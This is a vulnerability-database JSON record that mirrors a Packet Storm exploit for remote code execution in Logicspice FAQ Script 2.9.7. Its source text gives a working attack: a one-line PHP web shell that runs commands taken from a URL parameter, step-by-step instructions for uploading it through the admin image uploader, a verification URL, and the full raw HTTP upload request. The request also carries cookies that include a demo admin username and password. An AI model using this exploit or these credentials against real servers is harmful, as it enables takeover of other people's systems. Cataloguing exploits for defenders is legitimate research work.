{"id": "PACKETSTORM:149203", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Logicspice FAQ Script 2.9.7 Remote Code Execution", "description": "", "published": "2018-09-04T00:00:00", "modified": "2018-09-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/149203/Logicspice-FAQ-Script-2.9.7-Remote-Code-Execution.html", "reporter": "Ozkan Mustafa Akkus", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-09-06T10:33:17", "viewCount": 16, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "_state": {"dependencies": 1678917980, "score": 1678916296, "epss": 1678938645}, "_internal": {"score_hash": "6ff6c9d00d9b410f7e76099a3e5f34f7"}, "sourceHref": "https://packetstormsecurity.com/files/download/149203/logicspicefaqscript297-exec.txt", "sourceData": "`# Exploit Title: Logicspice FAQ Script 2.9.7 - Remote Code Execution \n# Dork: N/A \n# Date: 2018-09-03 \n# Exploit Author: Ozkan Mustafa Akkus (AkkuS) \n# Vendor Homepage: https://www.logicspice.com/products/faq-script \n# Software Link: https://www.logicspice.com/app/webroot/files/document/phpmyfaq-2.9.7.zip \n# Version: 2.9.7 \n# Category: Webapps \n# Tested on: Kali linux \n \n# Description : Logicspice FAQ Script 2.9.7 allows arbitrary file upload, which \n# leads to remote command execution on the remote server. \n \n# 1) Create a file with the below PHP code and save it as .php \n \n<?php $cmd=$_GET['cmd']; system($cmd); ?> \n \n# 2) Log in to the FAQ Script admin portal as a privileged user \n# 3) At the left hand side go to Manage FAQ --> List FAQ (http://domain/admin/faqs) \n# 4) Click the Actions button of a current FAQ product --> Edit \n# 5) Click the (Image) button on the Content panel. \n# 6) Choose the Upload section and browse to your .php file. \n# 7) Finally click \"Send it to Server\". The script will give you a link belonging to \n# our php file. \n# 8) Verify the exploit: \n# http://domain/webroot/files/uploadimages/e90a3_shell.php?cmd=id \n \n# The request: \n \nPOST \n/admin/faqs/faqimages?CKEditor=faqs-answer&CKEditorFuncNum=1&langCode=en \nHTTP/1.1 \nHost: faq-script.logicspice.com \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 \nFirefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: \nhttp://faq-script.logicspice.com/admin/faqs/edit/eine-frage-fuer-onkel-peter \nCookie: __asc=3c88bfff1659e6148e6168c52d2; \n__auc=3c88bfff1659e6148e6168c52d2; _ga=GA1.2.696297698.1535960501; \n_gid=GA1.2.2097449566.1535960501; __zlcmid=oDhc8xpdUQvf8W; \nadmin_username=logicspice; admin_password=faqscript_admin; \nCAKEPHP=omckos7rsug4u3e1k3uebi7ma5; PHPSESSID=be29d40p12q20gtpvlea8esp23 \nConnection: keep-alive \nUpgrade-Insecure-Requests: 1 \nContent-Type: multipart/form-data; \nboundary=---------------------------1036720403269880351068202740 \nContent-Length: 267 \n-----------------------------1036720403269880351068202740 \nContent-Disposition: form-data; name=\"upload\"; filename=\"shell.php\" \nContent-Type: application/x-php \n \n<?php $cmd=$_GET['cmd']; system($cmd); ?> \n-----------------------------1036720403269880351068202740-- \n \n`\n"}